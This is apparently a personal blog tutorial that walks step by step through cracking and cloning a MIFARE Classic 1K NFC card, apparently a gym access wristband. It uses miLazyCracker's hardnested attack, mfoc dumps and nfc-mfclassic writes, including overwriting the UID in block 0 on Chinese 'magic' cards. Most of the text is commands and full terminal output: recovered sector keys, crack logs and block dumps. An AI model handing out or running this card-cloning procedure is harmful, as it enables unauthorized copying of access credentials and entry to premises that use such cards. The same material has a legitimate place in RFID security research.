miLazyCracker Hack Mifare 1K Classic

Find out the Keys of a NFC Chip with miLazyCracker, Dump the Card with the hacked keys, Clone the dump onto a second card, Check if the contents are the same and change the manufacture block 0 with some china cards (mfcuk and mfoc command).

Inhaltsverzeichnis

Find out which card

Buy an ACR122U

Find out the Keys

Dump the card

Clone to the second card

Check if the cards are the same

Check the contents

Change also block zero 0

Find out which card

Fitnessstudio Armband – Reverse Engineering

Buy an ACR122U

ACS ACR122U USB 2.0 weiß Chipkartenleser - Chipkartenleser (USB 2.0, 65 x 12,8 x 98 mm, 70 g, Windows 2000, Windows 2000 Professional, Windows 7 Home Basic, Windows 7 Home Basic x64, Windows 7..., Android, ISO 14443, CE, FCC C, KC, VCCC. I, PC/SC, CCID, USB)

von ACS

Unterstützt neue Ultralight C (über Pseudo-APDUs) und Plus SL1 (4 Byte UID, über Pseudo APDUS) und SL3
Unterstützt ISO 14443 Typ A und B, FeliCa, und alle 4 Arten von NFC (ISO/IEC 18092) Tags
Lese-/Schreibgeschwindigkeit bis zu 424 kbps
CCID-konform PC/SC-konform
International products have separate terms, are sold from abroad and may differ from local products, including fit, age ratings, and language of product, labeling or instructions.

Unverb. Preisempf.: € 57,26 Du sparst: € 2,16 (-4%) Preis: € 55,10 Auf Amazon ansehen

Preis inkl. MwSt., zzgl. Versandkosten

Find out the Keys

Execute the miLazyCracker command (after installation)

Found key: 81cc25ebbb6a

Found key: 3e65e4fb65b3

Geräte LED geht auf rot -> direkt neu einstecken (No NFC device found.)

Sonst bricht das Programm ab

Dump the card

Mfoc download: https://github.com/nfc-tools/mfoc/releases

Take a dump of the card if you know key a and b from step 1

mfoc -O carddump.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a

With default keys (not changed, fresh card): mfoc -O carddump.dmp

Clone to the second card

You need the dump of the original card (step 1) and the dump of the card you want to put on the values of the original card (cloned card)

nfc-mfclassic w a DUMPORIGINALCARD DUMPCLONECARD

Both dumps done with step 2

Mathiass-MBP:dump mathias$ nfc-mfclassic w a u original.dmp clone.dmp
NFC reader: ACS ACR122U / ACR122U214 opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 04
 UID (NFCID1): 7b 78 32 3c
 SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Writing 64 blocks |...............................................................|
Done, 63 of 64 blocks written.

Check if the cards are the same

First original, second clone

Found out that the uid is different

Mathiass-MBP:mifare mathias$ nfc-list
nfc-list uses libnfc libnfc-1.7.1-191-g216145f
NFC device: ACS ACR122U / ACR122U214 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08

Mathiass-MBP:mifare mathias$ nfc-list
nfc-list uses libnfc libnfc-1.7.1-191-g216145f
NFC device: ACS ACR122U / ACR122U214 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 04
 UID (NFCID1): 7b 78 32 3c
 SAK (SEL_RES): 08

Check the contents

mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a

mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a

Mathiass-MBP:dump mathias$ hexdump -vC clone.dmp > clone.hex
Mathiass-MBP:dump mathias$ hexdump -vC original.dmp > original.hex
Mathiass-MBP:dump mathias$ diff clone.hex original.hex

Mathiass-MBP:dump mathias$ diff original.hex test.hex
1c1
< 00000000 04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00 |.....Y..D.. ....|
---
> 00000000 7b 78 32 3c 0d 08 04 00 01 6f 01 6d 45 68 f8 1d |{x2<.....o.mEh..|

Now you can see that just the first block with the uid of the card is different.

Change also block zero 0

nfc-mfclassic W a original.dmp clone.dmp

Mathiass-MBP:check mathias$ mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 7b 78 32 3c
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys…
Symbols: ‚.‘ no key found, ‚/‘ A key found, ‚\‘ B key found, ‚x‘ both keys found
[Key: 3e65e4fb65b3] -> [….///////////.]
[Key: 81cc25ebbb6a] -> [….xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 – Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 – Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 – Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Mathiass-MBP:check mathias$ mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
UID (NFCID1): 04 e8 f9 c2 a5 59 80
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
……………..
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00
Mathiass-MBP:check mathias$

Mathiass-MBP:mifare mathias$ miLazyCracker
 Found Mifare Classic 1k tag
 ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 * UID size: double
 * bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
 * Not compliant with ISO/IEC 14443-4
 * Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
 * MIFARE Classic 1K
 * MIFARE Plus (7 Byte UID) 2K, Security level 1
 Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
 Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
 [Key: ffffffffffff] -> [xxxx...........x]
 [Key: a0a1a2a3a4a5] -> [xxxx...........x]
 [Key: d3f7d3f7d3f7] -> [xxxx...........x]
 [Key: 000000000000] -> [xxxx...........x]
 [Key: b0b1b2b3b4b5] -> [xxxx...........x]
 [Key: 4d3a99c351dd] -> [xxxx...........x]
 [Key: 1a982c7e459a] -> [xxxx...........x]
 [Key: aabbccddeeff] -> [xxxx...........x]
 [Key: 714c5c886e97] -> [xxxx...........x]
 [Key: 587ee5f9350f] -> [xxxx...........x]
 [Key: a0478cc39091] -> [xxxx...........x]
 [Key: 533cb6c723f6] -> [xxxx...........x]
 [Key: 8fd0a4f256e9] -> [xxxx...........x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 04 - Unknown Key A Unknown Key B
 Sector 05 - Unknown Key A Unknown Key B
 Sector 06 - Unknown Key A Unknown Key B
 Sector 07 - Unknown Key A Unknown Key B
 Sector 08 - Unknown Key A Unknown Key B
 Sector 09 - Unknown Key A Unknown Key B
 Sector 10 - Unknown Key A Unknown Key B
 Sector 11 - Unknown Key A Unknown Key B
 Sector 12 - Unknown Key A Unknown Key B
 Sector 13 - Unknown Key A Unknown Key B
 Sector 14 - Unknown Key A Unknown Key B
 Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

Using sector 00 as an exploit sector
 Card is not vulnerable to nested attack
 MFOC not possible, detected hardened Mifare Classic
 Trying HardNested Attack...
 libnfc_crypto1_crack ffffffffffff 60 B 56 B mfc_04e8f9c2a55980_foundKeys.txt
 Found tag with uid c2a55980, collecting nonces for key B of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
 Collected 1909 nonces... leftover complexity 1186294334976 (~2^40.11) - press enter to start brute-force phase

Collected 1919 nonces... leftover complexity 1186294334976 (~2^40.11) - initializing brute-force phase...
 Starting 8 threads to test 1186294334976 states using 256-way bitslicing
 Cracking... 47.72%
 Found key: 81cc25ebbb6a
 Tested 566767883890 states
 81cc25ebbb6a
 mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
 The custom key 0x81cc25ebbb6a has been added to the default keys
 Found Mifare Classic 1k tag
 ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 * UID size: double
 * bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
 * Not compliant with ISO/IEC 14443-4
 * Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
 * MIFARE Classic 1K
 * MIFARE Plus (7 Byte UID) 2K, Security level 1
 Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
 Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
 [Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
 [Key: ffffffffffff] -> [xxxx\\\\\\\\\\\x]
 [Key: a0a1a2a3a4a5] -> [xxxx\\\\\\\\\\\x]
 [Key: d3f7d3f7d3f7] -> [xxxx\\\\\\\\\\\x]
 [Key: 000000000000] -> [xxxx\\\\\\\\\\\x]
 [Key: b0b1b2b3b4b5] -> [xxxx\\\\\\\\\\\x]
 [Key: 4d3a99c351dd] -> [xxxx\\\\\\\\\\\x]
 [Key: 1a982c7e459a] -> [xxxx\\\\\\\\\\\x]
 [Key: aabbccddeeff] -> [xxxx\\\\\\\\\\\x]
 [Key: 714c5c886e97] -> [xxxx\\\\\\\\\\\x]
 [Key: 587ee5f9350f] -> [xxxx\\\\\\\\\\\x]
 [Key: a0478cc39091] -> [xxxx\\\\\\\\\\\x]
 [Key: 533cb6c723f6] -> [xxxx\\\\\\\\\\\x]
 [Key: 8fd0a4f256e9] -> [xxxx\\\\\\\\\\\x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 04 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 05 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 06 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 07 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 08 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 09 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 10 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 11 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 12 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 13 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 14 - Unknown Key A Found Key B: 81cc25ebbb6a
 Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

Using sector 00 as an exploit sector
 Card is not vulnerable to nested attack
 MFOC not possible, detected hardened Mifare Classic
 Trying HardNested Attack...
 libnfc_crypto1_crack ffffffffffff 60 B 56 A mfc_04e8f9c2a55980_foundKeys.txt
 Found tag with uid c2a55980, collecting nonces for key A of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
 Collected 1584 nonces... leftover complexity 1922805806080 (~2^40.81) - initializing brute-force phase...
 Starting 8 threads to test 1922805806080 states using 256-way bitslicing
 Cracking... 78.92%
 Found key: 3e65e4fb65b3
 Tested 1517855538104 states
 81cc25ebbb6a
 3e65e4fb65b3
 mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
 The custom key 0x81cc25ebbb6a has been added to the default keys
 The custom key 0x3e65e4fb65b3 has been added to the default keys
 Found Mifare Classic 1k tag
 ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
 * UID size: double
 * bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
 * Not compliant with ISO/IEC 14443-4
 * Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
 * MIFARE Classic 1K
 * MIFARE Plus (7 Byte UID) 2K, Security level 1
 Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
 Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
 [Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
 [Key: 3e65e4fb65b3] -> [....xxxxxxxxxxx.]
 [Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
 [Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
 [Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
 [Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
 [Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
 [Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
 [Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
 [Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
 [Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
 [Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
 [Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
 [Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
 [Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
 Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
 Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
 Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
 Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

 .......... 

 Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
 Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00

Dump left in: mfc_04e8f9c2a55980_dump.mfd
 Do you want clone the card? Place card on reader now and press Y [y/n] y
 Usage: nfc-mfclassic f|r|R|w|W a|b u|U<01ab23cd> <dump.mfd> [<keys.mfd> [f]]
 f|r|R|w|W - Perform format (f) or read from (r) or unlocked read from (R) or write to (w) or unlocked write to (W) card
 *** format will reset all keys to FFFFFFFFFFFF and all data to 00 and all ACLs to default
 *** unlocked read does not require authentication and will reveal A and B keys
 *** note that unlocked write will attempt to overwrite block 0 including UID
 *** unlocking only works with special Mifare 1K cards (Chinese clones)
 a|A|b|B - Use A or B keys for action; Halt on errors (a|b) or tolerate errors (A|B)
 u|U - Use any (u) uid or supply a uid specifically as U01ab23cd.
 <dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
 <keys.mfd> - MiFare Dump (MFD) that contain the keys (optional)
 f - Force using the keyfile even if UID does not match (optional)
 Examples:

Read c nfc-mfclassic f B u dummy.mfd keyfile.mfd f

Read card to file, using key A and uid 0x01 0xab 0x23 0xcd:

nfc-mfclassic r a U01ab23cd mycard.mfd

Die Anzeige der Produkte wurde mit dem affiliate-toolkit Plugin umgesetzt.

miLazyCracker Hack Mifare 1K Classic

Find out which card

Buy an ACR122U

Find out the Keys

Dump the card

Clone to the second card

Check if the cards are the same

Check the contents

Change also block zero 0

About The Author

mattionline

2 Kommentare zu „miLazyCracker Hack Mifare 1K Classic“

Kommentar verfassen Kommentieren abbrechen